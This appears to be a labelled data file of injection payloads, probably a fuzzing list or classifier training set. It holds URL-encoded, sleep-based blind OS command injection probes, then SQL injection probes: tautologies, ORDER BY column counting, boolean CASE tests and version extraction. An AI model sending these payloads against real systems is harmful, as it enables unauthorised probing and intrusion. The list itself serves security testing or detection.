+os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +sql-injection,'OR 1=1' +sql-injection,'OR 1=0' +sql-injection,'OR x=x' +sql-injection,'OR x=y' +sql-injection,'OR 1=1#' +sql-injection,'OR 1=0#' +sql-injection,'OR x=x#' +sql-injection,'OR x=y#' +sql-injection,'OR 1=1--' +sql-injection,'OR 1=0--' +sql-injection,'OR x=x--' +sql-injection,'OR x=y--' +sql-injection,'OR 3409=3409 AND ('pytW' LIKE 'pytW' +sql-injection,'OR 3409=3409 AND ('pytW' LIKE 'pytY' +sql-injection,'HAVING 1=1' +sql-injection,'HAVING 1=0' +sql-injection,'HAVING 1=1#' +sql-injection,'HAVING 1=0#' +sql-injection,'HAVING 1=1--' +sql-injection,'HAVING 1=0--' +sql-injection,'AND 1=1' +sql-injection,'AND 1=0' +sql-injection,'AND 1=1--' +sql-injection,'AND 1=0--' +sql-injection,'AND 1=1#' +sql-injection,'AND 1=0#' +sql-injection,'AND 1=1 AND '%'='' +sql-injection,'AND 1=0 AND '%'='' +sql-injection,'AND 1083=1083 AND (1427=1427' +sql-injection,'AND 7506=9091 AND (5913=5913' +sql-injection,'AND 1083=1083 AND ('1427=1427' +sql-injection,'AND 7506=9091 AND ('5913=5913' +sql-injection,'AND 7300=7300 AND 'pKlZ'='pKlZ' +sql-injection,'AND 7300=7300 AND 'pKlZ'='pKlY' +sql-injection,'AND 7300=7300 AND ('pKlZ'='pKlZ' +sql-injection,'AND 7300=7300 AND ('pKlZ'='pKlY' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=1' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=0' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=1#' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=0#' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=1--' +sql-injection,'AS INJECTX WHERE 1=1 AND 1=0--' +sql-injection,'WHERE 1=1 AND 1=1' +sql-injection,'WHERE 1=1 AND 1=0' +sql-injection,'WHERE 1=1 AND 1=1#' +sql-injection,'WHERE 1=1 AND 1=0#' +sql-injection,'WHERE 1=1 AND 1=1--' +sql-injection,'WHERE 1=1 AND 1=0--' +sql-injection,'ORDER BY 1--' +sql-injection,'ORDER BY 2--' +sql-injection,'ORDER BY 3--' +sql-injection,'ORDER BY 4--' +sql-injection,'ORDER BY 5--' +sql-injection,'ORDER BY 6--' +sql-injection,'ORDER BY 7--' +sql-injection,'ORDER BY 8--' +sql-injection,'ORDER BY 9--' +sql-injection,'ORDER BY 10--' +sql-injection,'ORDER BY 11--' +sql-injection,'ORDER BY 12--' +sql-injection,'ORDER BY 13--' +sql-injection,'ORDER BY 14--' +sql-injection,'ORDER BY 15--' +sql-injection,'ORDER BY 16--' +sql-injection,'ORDER BY 17--' +sql-injection,'ORDER BY 18--' +sql-injection,'ORDER BY 19--' +sql-injection,'ORDER BY 20--' +sql-injection,'ORDER BY 21--' +sql-injection,'ORDER BY 22--' +sql-injection,'ORDER BY 23--' +sql-injection,'ORDER BY 24--' +sql-injection,'ORDER BY 25--' +sql-injection,'ORDER BY 26--' +sql-injection,'ORDER BY 27--' +sql-injection,'ORDER BY 28--' +sql-injection,'ORDER BY 29--' +sql-injection,'ORDER BY 30--' +sql-injection,'ORDER BY 31337--' +sql-injection,'ORDER BY 1#' +sql-injection,'ORDER BY 2#' +sql-injection,'ORDER BY 3#' +sql-injection,'ORDER BY 4#' +sql-injection,'ORDER BY 5#' +sql-injection,'ORDER BY 6#' +sql-injection,'ORDER BY 7#' +sql-injection,'ORDER BY 8#' +sql-injection,'ORDER BY 9#' +sql-injection,'ORDER BY 10#' +sql-injection,'ORDER BY 11#' +sql-injection,'ORDER BY 12#' +sql-injection,'ORDER BY 13#' +sql-injection,'ORDER BY 14#' +sql-injection,'ORDER BY 15#' +sql-injection,'ORDER BY 16#' +sql-injection,'ORDER BY 17#' +sql-injection,'ORDER BY 18#' +sql-injection,'ORDER BY 19#' +sql-injection,'ORDER BY 20#' +sql-injection,'ORDER BY 21#' +sql-injection,'ORDER BY 22#' +sql-injection,'ORDER BY 23#' +sql-injection,'ORDER BY 24#' +sql-injection,'ORDER BY 25#' +sql-injection,'ORDER BY 26#' +sql-injection,'ORDER BY 27#' +sql-injection,'ORDER BY 28#' +sql-injection,'ORDER BY 29#' +sql-injection,'ORDER BY 30#' +sql-injection,'ORDER BY 31337#' +sql-injection,'ORDER BY 1' +sql-injection,'ORDER BY 2' +sql-injection,'ORDER BY 3' +sql-injection,'ORDER BY 4' +sql-injection,'ORDER BY 5' +sql-injection,'ORDER BY 6' +sql-injection,'ORDER BY 7' +sql-injection,'ORDER BY 8' +sql-injection,'ORDER BY 9' +sql-injection,'ORDER BY 10' +sql-injection,'ORDER BY 11' +sql-injection,'ORDER BY 12' +sql-injection,'ORDER BY 13' +sql-injection,'ORDER BY 14' +sql-injection,'ORDER BY 15' +sql-injection,'ORDER BY 16' +sql-injection,'ORDER BY 17' +sql-injection,'ORDER BY 18' +sql-injection,'ORDER BY 19' +sql-injection,'ORDER BY 20' +sql-injection,'ORDER BY 21' +sql-injection,'ORDER BY 22' +sql-injection,'ORDER BY 23' +sql-injection,'ORDER BY 24' +sql-injection,'ORDER BY 25' +sql-injection,'ORDER BY 26' +sql-injection,'ORDER BY 27' +sql-injection,'ORDER BY 28' +sql-injection,'ORDER BY 29' +sql-injection,'ORDER BY 30' +sql-injection,'ORDER BY 31337' +sql-injection,'RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='' +sql-injection,'RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='' +sql-injection,'IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--' +sql-injection,'IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--' +sql-injection,'%' AND 8310=8310 AND '%'='' +sql-injection,'%' AND 8310=8311 AND '%'='' +sql-injection,'and (select substring(@@version,1,1))='X'' +sql-injection,'and (select substring(@@version,1,1))='M'' +sql-injection,'and (select substring(@@version,2,1))='i'' +sql-injection,'and (select substring(@@version,2,1))='y'' +sql-injection,'and (select substring(@@version,3,1))='c'' +sql-injection,'and (select substring(@@version,3,1))='S'' +sql-injection,'and (select substring(@@version,3,1))='X'' +sql-injection,''' +sql-injection,'''' +sql-injection,'`' +sql-injection,'``' +sql-injection,',' +sql-injection,'"' +sql-injection,'""' +sql-injection,'/' +sql-injection,'//' +sql-injection,'\' +sql-injection,'\\' +sql-injection,';' +sql-injection,'' or "' +sql-injection,'-- or #' +sql-injection,'' OR '1' +sql-injection,'' OR 1 -- -' +sql-injection,'" OR "" = "' +sql-injection,'" OR 1 = 1 -- -' +sql-injection,'' OR '' = '' +sql-injection,''='' +sql-injection,''LIKE'' +sql-injection,''=0--+' +sql-injection,'OR 1=1' +sql-injection,'' OR 'x'='x' +sql-injection,'' AND id IS NULL; --' +sql-injection,''''''''''''''UNION SELECT '2' +sql-injection,'%00' +sql-injection,'/*…*/' +sql-injection,'+ addition, concatenate (or space in url)' +sql-injection,'|| (double pipe) concatenate' +sql-injection,'% wildcard attribute indicator' +sql-injection,'@variable local variable' +sql-injection,'@@variable global variable' +sql-injection,'# Numeric' +sql-injection,'AND 1' +sql-injection,'AND 0' +sql-injection,'AND true' +sql-injection,'AND false' +sql-injection,'1-false' +sql-injection,'1-true' +sql-injection,'1*56' +sql-injection,'-2' +sql-injection,'1' ORDER BY 1--+' +sql-injection,'1' ORDER BY 2--+' +sql-injection,'1' ORDER BY 3--+' +sql-injection,'1' ORDER BY 1,2--+' +sql-injection,'1' ORDER BY 1,2,3--+' +sql-injection,'1' GROUP BY 1,2,--+' +sql-injection,'1' GROUP BY 1,2,3--+' +sql-injection,'' GROUP BY 